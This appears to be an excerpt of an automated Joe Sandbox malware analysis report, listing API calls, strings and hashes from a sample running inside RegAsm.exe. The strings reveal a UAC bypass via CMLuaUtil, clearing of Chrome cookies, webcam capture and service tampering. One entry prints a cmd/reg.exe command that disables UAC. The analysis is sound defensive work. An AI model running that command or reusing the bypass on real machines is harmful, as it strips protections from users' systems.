                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 3e1437a1f94eb298758500833f4fd37ec9f384a351c1712870bfe34c5990e753
                                                                                                                                                                                          • Instruction ID: d4e598e7927038c57750db0ba161657e9615562456f8c919f0676739ef068bdb
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e1437a1f94eb298758500833f4fd37ec9f384a351c1712870bfe34c5990e753
                                                                                                                                                                                          • Instruction Fuzzy Hash: 931127B2504214BBEB216F768C05D1F7A5CEB86726B52062EFD55C7292DA3CCC0186A8
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00450CC1: _free.LIBCMT ref: 00450CEA
                                                                                                                                                                                          • _free.LIBCMT ref: 00450FC8
                                                                                                                                                                                            • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                                                                                                                                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                                                                                                          • _free.LIBCMT ref: 00450FD3
                                                                                                                                                                                          • _free.LIBCMT ref: 00450FDE
                                                                                                                                                                                          • _free.LIBCMT ref: 00451032
                                                                                                                                                                                          • _free.LIBCMT ref: 0045103D
                                                                                                                                                                                          • _free.LIBCMT ref: 00451048
                                                                                                                                                                                          • _free.LIBCMT ref: 00451053
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                          • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                                                                                                                                          • Instruction ID: 345e916fd15b447c36d88a7a8914fd19e4c3e0710e9d23c2e9f19f8556552687
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                                                                                                                                          • Instruction Fuzzy Hash: C111D231402704AAE621BB72CC03FCB779CAF03304F454D2EBEA967153C7ACB4185654
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 004111AB
                                                                                                                                                                                          • int.LIBCPMT ref: 004111BE
                                                                                                                                                                                            • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                                                                                                                                                            • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                                                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 004111FE
                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00411207
                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00411225
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                                                                                                          • String ID: (mG
                                                                                                                                                                                          • API String ID: 2536120697-4059303827
                                                                                                                                                                                          • Opcode ID: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                                                                                                                                                                                          • Instruction ID: b4facbf35e110c19f3eede998f69f9310dce987b63f856d60fe44c7d5fb17b17
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                                                                                                                                                                                          • Instruction Fuzzy Hash: 42112732900114A7CB14EB9AD8018DEB7699F44364F11456FF904F72E1DB789E45CBC8
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,0043A3D1,0043933E), ref: 0043A3E8
                                                                                                                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A3F6
                                                                                                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40F
                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,0043A3D1,0043933E), ref: 0043A461
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3852720340-0
                                                                                                                                                                                          • Opcode ID: f8b088146f32705476b05de113eddff258cc1bfa1c523dc592fb57b9cb9462fc
                                                                                                                                                                                          • Instruction ID: 228fd8bb196f6ae1284969ba5442ea73dc67404c1df350b3d70410c0baad6fb0
                                                                                                                                                                                          • Opcode Fuzzy Hash: f8b088146f32705476b05de113eddff258cc1bfa1c523dc592fb57b9cb9462fc
                                                                                                                                                                                          • Instruction Fuzzy Hash: 87019C322483515EA61027797C8A62B2648EB293B9F30523FF518805F1EF984C90910D
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 0040760B
                                                                                                                                                                                            • Part of subcall function 00407538: _wcslen.LIBCMT ref: 0040755C
                                                                                                                                                                                            • Part of subcall function 00407538: CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                                                                                                                                                                          • CoUninitialize.OLE32 ref: 00407664
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InitializeObjectUninitialize_wcslen
                                                                                                                                                                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                                                                                                                                          • API String ID: 3851391207-1839356972
                                                                                                                                                                                          • Opcode ID: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                                                                                                                                                          • Instruction ID: e4e7d1672fbddd81374e29e92f863be8f9bad83f72bb7a306ddb251afa86686e
                                                                                                                                                                                          • Opcode Fuzzy Hash: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4501D272B087116BE2246B65DC4AF6B3748DB41B25F11053FF901A62C1EAB9FC0146AB
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BB18
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0040BB22
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • [Chrome Cookies found, cleared!], xrefs: 0040BB48
                                                                                                                                                                                          • UserProfile, xrefs: 0040BAE8
                                                                                                                                                                                          • [Chrome Cookies not found], xrefs: 0040BB3C
                                                                                                                                                                                          • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAE3
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DeleteErrorFileLast
                                                                                                                                                                                          • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                                                                                                                          • API String ID: 2018770650-304995407
                                                                                                                                                                                          • Opcode ID: e57bb7af6ede7258cae938a4b9e303b9ad2d55d8c8bd3889b57b796562934694
                                                                                                                                                                                          • Instruction ID: 5dee569c6883bfd73109a670bb68234af0f28e4caad238985ba957b2c74b96e7
                                                                                                                                                                                          • Opcode Fuzzy Hash: e57bb7af6ede7258cae938a4b9e303b9ad2d55d8c8bd3889b57b796562934694
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5B01DF71A402055BCA04B7B6CC1B9BE7B24E922704B50017FF502726D6FE3E5D0986CE
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __allrem.LIBCMT ref: 0043ACE9
                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD05
                                                                                                                                                                                          • __allrem.LIBCMT ref: 0043AD1C
                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD3A
                                                                                                                                                                                          • __allrem.LIBCMT ref: 0043AD51
                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD6F
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1992179935-0
                                                                                                                                                                                          • Opcode ID: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                                                                                                                                                          • Instruction ID: c7cd181284538591ee8af1586cca3d38175ba7b34bac8e5aa56d350f01832762
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5F815972A40B05ABE7209F29CC41B6FB3A99F48324F24152FF591D67C1E77CE910875A
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • Sleep.KERNEL32(00000000,0040D29D), ref: 004044C4
                                                                                                                                                                                            • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: H_prologSleep
                                                                                                                                                                                          • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                                                                                                                                                                          • API String ID: 3469354165-3054508432
                                                                                                                                                                                          • Opcode ID: b0885c851fcfaa11fbeaa2e4eb94ca5760e61d5ae2f9e26ba5bd1b1b7bfa12d4
                                                                                                                                                                                          • Instruction ID: df1e58e957a7578ae16e417911435538e3341edc64810737793f4aa4f8849b6c
                                                                                                                                                                                          • Opcode Fuzzy Hash: b0885c851fcfaa11fbeaa2e4eb94ca5760e61d5ae2f9e26ba5bd1b1b7bfa12d4
                                                                                                                                                                                          • Instruction Fuzzy Hash: A751E171A042106BCA14FB369D0A66E3755ABC4748F00443FFA0A676E2DF7D8E45839E
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: __cftoe
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4189289331-0
                                                                                                                                                                                          • Opcode ID: b8ae44c08c0882fa39500d2d2dac1bf8c00faf8b5df33dcca1ed9daa4f2809fe
                                                                                                                                                                                          • Instruction ID: b93b8478136607885b926496a305f1bfb884a7f6acf724e610c81469f19cb9e5
                                                                                                                                                                                          • Opcode Fuzzy Hash: b8ae44c08c0882fa39500d2d2dac1bf8c00faf8b5df33dcca1ed9daa4f2809fe
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2551FD72500605ABFF209B598C81EAF77A8EF45334F25421FF915A6293DB3DD900C66D
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD19
                                                                                                                                                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A41F,00000000), ref: 0041AD2D
                                                                                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD3A
                                                                                                                                                                                          • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD6F
                                                                                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD81
                                                                                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD84
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 493672254-0
                                                                                                                                                                                          • Opcode ID: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
                                                                                                                                                                                          • Instruction ID: 77e668261cf9ee2bd18e5a0e87596c089765e66a1be6d3c981f75cbf7ed2a716
                                                                                                                                                                                          • Opcode Fuzzy Hash: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
                                                                                                                                                                                          • Instruction Fuzzy Hash: A7016D311462157AD6111B34AC4EFFB3B6CDB02772F10032BF625965D1DA68CE8195AB
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                                                                          • _free.LIBCMT ref: 004482CC
                                                                                                                                                                                          • _free.LIBCMT ref: 004482F4
                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                                                                          • _abort.LIBCMT ref: 00448313
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3160817290-0
                                                                                                                                                                                          • Opcode ID: c2591106eec843b6d6e807480f59c56eb64d59fc50806e925db96e87570db6c2
                                                                                                                                                                                          • Instruction ID: 8d34d3ffa9a8a5ca7629c839d325bdddc3ef58a145117f7ac1d0225592351e3a
                                                                                                                                                                                          • Opcode Fuzzy Hash: c2591106eec843b6d6e807480f59c56eb64d59fc50806e925db96e87570db6c2
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8EF0A435101B006BF611772A6C06B6F26599BD3B69F36042FFD18962D2EF6DCC42816D
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB46
                                                                                                                                                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB5A
                                                                                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB67
                                                                                                                                                                                          • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB76
                                                                                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB88
                                                                                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB8B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 221034970-0
                                                                                                                                                                                          • Opcode ID: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                                                                                                                                                                                          • Instruction ID: 443f58cffa4f299642b313368f914f767bd977a6fac550f0ec2f38f013616b5a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                                                                                                                                                                                          • Instruction Fuzzy Hash: E4F0F631541318BBD7116F259C49DFF3B6CDB45B62F000026FE0992192EB68DD4595F9
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC4A
                                                                                                                                                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC5E
                                                                                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC6B
                                                                                                                                                                                          • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC7A
                                                                                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8C
                                                                                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8F
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 221034970-0
                                                                                                                                                                                          • Opcode ID: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
                                                                                                                                                                                          • Instruction ID: 80b71cf000cc834045a6d48b23744411b71cc7e49355023a2f572df053a73ec4
                                                                                                                                                                                          • Opcode Fuzzy Hash: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
                                                                                                                                                                                          • Instruction Fuzzy Hash: 73F0C231501218ABD611AF65AC4AEFF3B6CDB45B62F00002AFE0992192EB38CD4595E9
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACB1
                                                                                                                                                                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACC5
                                                                                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACD2
                                                                                                                                                                                          • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACE1
                                                                                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF3
                                                                                                                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF6
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 221034970-0
                                                                                                                                                                                          • Opcode ID: d2f399c3bcd0f1044f14c411125fc5822346b4401d7891a80fcd35a5d0c32c00
                                                                                                                                                                                          • Instruction ID: 4c72e2560426042a93d841201029be6eaa37955ba2c7d49e75f16ae618c5df44
                                                                                                                                                                                          • Opcode Fuzzy Hash: d2f399c3bcd0f1044f14c411125fc5822346b4401d7891a80fcd35a5d0c32c00
                                                                                                                                                                                          • Instruction Fuzzy Hash: 85F0F631501228BBD7116F25AC49DFF3B6CDB45B62F00002AFE0992192EB38CD46A6F9
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegisterClassExA.USER32(00000030), ref: 0041D5EC
                                                                                                                                                                                          • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D607
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0041D611
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000021.00000002.1754049222.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_33_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ClassCreateErrorLastRegisterWindow
                                                                                                                                                                                          • String ID: 0$MsgWindowClass
                                                                                                                                                                                          • API String ID: 2877667751-2410386613
                                                                                                                                                                                          • Opcode ID: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                                                                                                                                                          • Instruction ID: e808ecd18ef19f47bd472c0c6462b34ef8490c58390ad3ae495a6aa035ed2a4b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1F0125B1D00219ABDB00DFA5EC849EFBBBCEA08355F40453AF914A6241EB7589058AA4
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004077D6
                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 004077E5
                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 004077EA
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • C:\Windows\System32\cmd.exe, xrefs: 004077D1
